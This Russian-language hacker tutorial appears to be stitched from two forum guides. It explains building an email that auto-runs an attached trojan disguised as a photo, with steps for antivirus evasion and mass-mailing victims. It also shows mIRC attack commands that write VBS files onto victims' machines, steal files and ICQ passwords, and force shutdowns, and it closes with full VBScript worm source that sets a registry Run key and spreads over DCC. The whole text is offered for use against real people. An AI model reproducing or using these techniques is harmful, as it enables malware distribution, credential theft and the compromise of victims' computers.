—====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary=»====_ABC0987654321DEF_====»

—====_ABC0987654321DEF_====
Content-Type: text/html;
charset=»iso-8859-1″
Content-Transfer-Encoding: quoted-printable

—====_ABC0987654321DEF_====—

—====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name=»Troyan.jpg.exe”
Content-Transfer-Encoding: base64
Content-ID:

На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста )

—====_ABC1234567890DEF_====

—====_ABC1234567890DEF_====—

Кстати в проге zender уже лежит пример готового файл Mail.eml с уже вложенным туда трояном. Открыв его также в текстовом редакторе вы и увидете как в нём будет выглядит сам файл трояна тесктом, он там как раз и будет в base-64 кодировке. Выглядеть это будет примерно вот так:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAgAAAAA
4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC
BiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB
QRQAATAEDAGVj+zwAAAAAAAAAAOAADwELAQED
ABAAAAAQAAAAYAAA4HkAAABwAAAAgAAAAABAAA
AQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAACQAAAA
EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAA
ABAAAAAAAAAAAAAAAKSDAAB0AQAAAIAAAKQDAA
AAAAAAAAAAAAAAAAAAААА

Это и есть сам файл трояна , просто он в кодировке base-64. Но только не открывайте этот файл вашим Оутглюком, так как у автора проги видно есть «чуство юмора» и он вместо того чтоб вложить в это письмо для примера какую-нить безобидную программку…. вложил туда настоящего своего трояна и если вы это письмо откроете своим Оутглюком то он сразу автоматически запустится у вас на компе. Ну а вы думаете почему я вас Bat поставить просил. Да и ещё установите в Бате в настройках ассоциации файлов .eml с Батом и тогда такие файлы у вас будут открыватся не в Оутглюке а в Бате и вы сможете их спокойно открывать и смотреть, так как в Бате такого бага как в Оутлюке нету. И так письмо у нас есть, теперь в него надо вставить трояна. И что надо сделать чтобы вставить в ваше в письмо mail.eml уже сконфигурированного вами вашего родного трояна и как узнать как он выглядит в base-64 кодировке. Для этого нам и пригодится Бат. Открываем его. В нём создаём новое письмо, присоединяем к нему вашего трояна и жмём на кнопочку отправить , не важно кому так как мы его отправлять ни куда не собираемся, письмо соответственно попадёт в папку «Исходящие» (это если у вас Бат русифицирован), но нам оно там нам не нужно поэтому берём и перемещаем его в папку «Входящие» (просто перетаскиваем мышкой), затем открываем его там щёлкая по нему два раза и ищем в открывшемся окне вверху меню «Спецальное» а в нём выбираем «исходный текст» и увидим наше письмо токлько файл с нашим трояном будет там как раз в нужной нам base-64 кодировке, я уже говорил как он будет выглядеть (внешнее похоже на большой блок ровного и непрерывного текста), так вот выделяем именно только этот текст и копируем его в буфер обмена (для тех кто не знает кто это такая «буфер обмена» то копируйте в простой текстовой документ :). Затем открываем наше уже заготовленное письмо mail.eml в текстовом редакторе и вставляем этот текст заместо того который я уже писал выше:
На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста)
Саму эту надпись конечно же удаляем!!! Сории что объясняю как даунам каким то , но ведь блин найдутся те которые так и не врубятся куда что и заместо чего вставлять. Так же можете взять пример письма из проги Zender (там он называется Mail.eml) и так же открыв его в тестовом редакторе удалить из него только текст (в base-64 кодировке) файла с трояном автора и вставить туда текст (в base-64 кодировке) уже своего сконфигурированного трояна. Кстати не забудьте поменять в файле строки From , To и Subject на нужные вам, и ещё поменяйте в строке Name=»имя_трояна.exe» на что нибудь другое типа name=»my_sexy_foto.jpg.exe». То что вы там поставите и будет отбражаться в полях письма From, To, Subject и имя приатаченного файла , которое получит жертва. Кстати нам так же пригодится и Joiner , склейте с трояном какую нить фотку, потому что не у всех может Оутглюк стоять и когда жертва будет открывать файл уже самостоятельно ей предстанет перед глазами эта фотка, а ваш троян в это время будет делать своё грязное дело. Да, ещё за место расширения файла .exe можно поставаить .scr – это расширение у скринсейверов (программ-заставок) но действовать будет так же как и с .exe , просто таким образом можно немного усыпить бдительность жертвы. Сохраняемся, и всё письмо с трояном mail.eml готово. Теперь если открыть это письмо Оутглюком то файл автоматически запустится. Теперь о том как пользоваться Zenderom для отсылки этого письма, потому как обычной почтовой програмой его не отошлёшь так как она поменяет все заголовки на другие и троян в письме уже автоматически не запустится . Для начала прочтите там файл с описанием. Если не поняли то объясню на пальцах. В начале кладёте ваше письмо mail.eml в папку с Zenderom. Там же в папке есть файл user.txt . Он нам и нужен для рассылки. В первой строчке после from= пишем любой существующий адрес на каком нить бесплатном мыльном сервисе, главное чтоб он там существовал и чтоб сервак имел smtp сервер. Ну например from=vasya@mail.ru . Он в принцепе не имеет большого значения и нужен для того чтоб прога могла через этот мыльный сервак и его smtp сервер разослать письмо уже на адреса ваших жертв. А вот на следущей строчке уже просто пишите адреса ваших жертв, их может быть сколь угодно много главное чтоб они все начинались с новой строки. Теперь запускаете саму прогу zender.exe и она разашлёт ваше письмо с трояном по всем этим адресам. Кстати у проги нет интерфейса ( т.е. ни каких окошечек у вас не появится) , так что следить за тем как она рассылает письмо можно будет по самому соединению (значок который мигает у вас в трее когда вы подключаетесь к инету). Когда она разошлёт письмо по всем указаным вами адресам то появится окошко с надписью All done это значит что письмо разослано. А если вы рассылаете не на один адресс, а например по спам листу на несколько десятков адрессов, то чтоб не ждать пока прога разошлёт файл по всем этим адрессам и не терять много драгоценного время в инете делайте так….. заведите себе например на рамблере любое мыло и поставтье на нём переадресацию на имеющиеся у вас многочисленные адресса жертв, а в файле user.txt заместо адрессов жертв напишите всего один адрес этого вашего мыла на рамблере и всё, теперь запустите прогу и она пошлёт письмо на этот адресс, а уж сервак рамблера сам сделает за вас всю грязную работу и разашлёт письмо по всем адресам которые вы указали в переадресации. Так что теперь эфективность рассылки трояна у вас значительно повысится по сравнению с тем как вы его раньше рассылали простым дедовским способом :)))). Так как ещё много тех кто сидит на Вынь9х и Отглюках :). Кстати щас само письмо mail.eml сосотавленное таким вот образом чтоб автоматически запускался приатаченный к нему файл определяется многими антивирусами как троян даже если вы туда ещё ни кого трояна и не вставляли, у меня например мой ДокторВъеб ругается на это письмо что типа это troyanIframe :)))), правда если письмо лежит в каком zip архиве то он на него молчит, хотя ведь сами архмвы он шмонать умеет хорошо, вот так то, так что на время составления письма придётся выгружать ваши антивирусные мониторы , а то ведь работать нормально не дадут :)). Ну вот и всё. По моему всё понятно рассказал. У кого будут какие вопросы пишите (можете даже такие вот письма с автозапуском… у меня всё равно Бат стоит :))))). Удачи.

Я думаю тут все понятно и без обьяснений =))
Так… теперь мы можем найти пользователя на канале с уязвимостью и сможем пошутить над ним, но какже быть с более серьёзными атаками
Минус в том что ети команды не обрабатывают идентификаторы, но зачемже тогда команда /write =)))
так вот пример атаки и сбора сведений о компьютере жертвы
___________________________________________________________________________
—- > Узнаю в какой директории лежит Мирк .exe
[06:59:12] -> [[SF]Norfolk] /WRITE fool.txt /notice Кевин_Митник $mircdir
[06:59:56] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[06:59:58] -[SF]Norfolk- D:Мирка
—- > Узнаю на каком диске находится WINDOWS
[07:02:21] -> [[SF]Norfolk] /WRITE fool.vbs set FSO = createobject(«scripting.filesystemObject»)
[07:02:33] -> [[SF]Norfolk] /WRITE fool.vbs set dirwin = fso.getspecialfolder(0)
[07:02:46] -> [[SF]Norfolk] /WRITE fool.vbs set text = fso.createtextfile(«fool.txt»)
[07:02:59] -> [[SF]Norfolk] /WRITE fool.vbs text.writeline «/notice Кевин_Митник» & » » & dirwin
[07:03:09] -> [[SF]Norfolk] /WRITE fool.vbs text.close
[07:03:36] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[07:03:38] -[SF]Norfolk- C:WINDOWS
—- > Очищаю документы
[07:05:36] -> [[SF]Norfolk] /WRITE -c fool.txt
[07:05:39] -> [[SF]Norfolk] /WRITE -c fool.vbs
____________________________________________________________________________
Как вы уже поняли можно записывать файлы на компьютер жертвы и потом проигрывать их для определённого канала.
ВНИМАНИЕ: Жертва видит что отсылает вам нотисы, так что советую использовать ето когда мирк жертвы свёрнут в трей или жертвы нет у компьютера. И не забывайте чистить файлы а лучше удалять их с компьютера жертвы.
Лучше всего выключать компьютер жертве командой /ctcp NICK /RUN shutdown.exe -s -f -t 00
Вот некоторые идентификаторы которые помогут тебе собрать нужную информацию
OS — $os
Host — $host
email — $emailaddr
Название лога который лежит в папке под номером 100 — $findfile($mircdirlogs,*.*,100)
$disk(C:) — C: если диск существует то вам веррнется $true
$disk(D:) — D:
$disk(E:) — E:
mirc folder — $mircdir
Следующий пример неработает в некоторых irc серверах
Вы должны заставить жертву набрать следующее:
/fserve OUR_NICK 4 c:
После этого диск C: компьютера жертвы будет открыт для вас. И вы сможете делать следующее:
Команды:
cd : С помощью этой команды вы можете перейти в любую папку.
Например: cd windows (попадёте в папку windows)
dir : Команда как в MS-DOS
get : Важная команда! Вы можете получить любые файлы с компьютера жертвы. Жертва видит передачу файлов, но если получать маленькие по обьёму файлы то передача будет очень быстрой и жертва может просто не заметить этого.
read: Чтение текстовых файлов.
Вы можете получить пароль от ICQ жертвы. Используя команду get получаете файл .dat и можете получить пароль от ICQ.
Дальше больше.
Попробуем написать вирус который будет рассылать себя по мирку и заражать траянчегом их
set FSO = createobject(«scripting.filesystemObject»)
set scriptini = fso.CreateTextFile(«C:Program Filesscript.ini»)
set virus = FSO.getfile(wscript.scriptfullname)
Set S = CreateObject(«Wscript.Shell»)
mircfile = «»&»St1m.jpg .vbs»
virus.copy(dirsystem&mircfile)
mircoff = dirsystem&mircfile
S.regwrite «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesKernel32″, mircoff
scriptini.WriteLine «[script]»
scriptini.WriteLine «n0= on 1:JOIN:#:{»
scriptini.WriteLine «n1= if ( $nick == $me ) { halt }»
scriptini.WriteLine «n2= /dcc send $nick» &» «&mircoff
scriptini.WriteLine «n3= on 1:JOIN:#:{ »
scriptini.WriteLine «n4 /write St1m.st ctcp 1:*:?:$1- | Load -rs St1m.st »
scriptini.WriteLine «n5 }»
set f = fso.GetFolder(«C:Program Files»)
set sf = f.SubFolders
for each f1 in sf
set viruss = FSO.getfile(«C:Program Filesscript.ini»)
file1 =»»&»script.ini»
viruss.copy(f1&file1)
next
Если мирк находится или будет находиться в Program Files то етот скрипт его обезательно заразит и начнёт сам себя рассылать всем кто присоединяется к каналам на которых сидит жертва. Даже если жертва удалит мирк и переустановит её то после перезагрузки новый мирк опять заразится.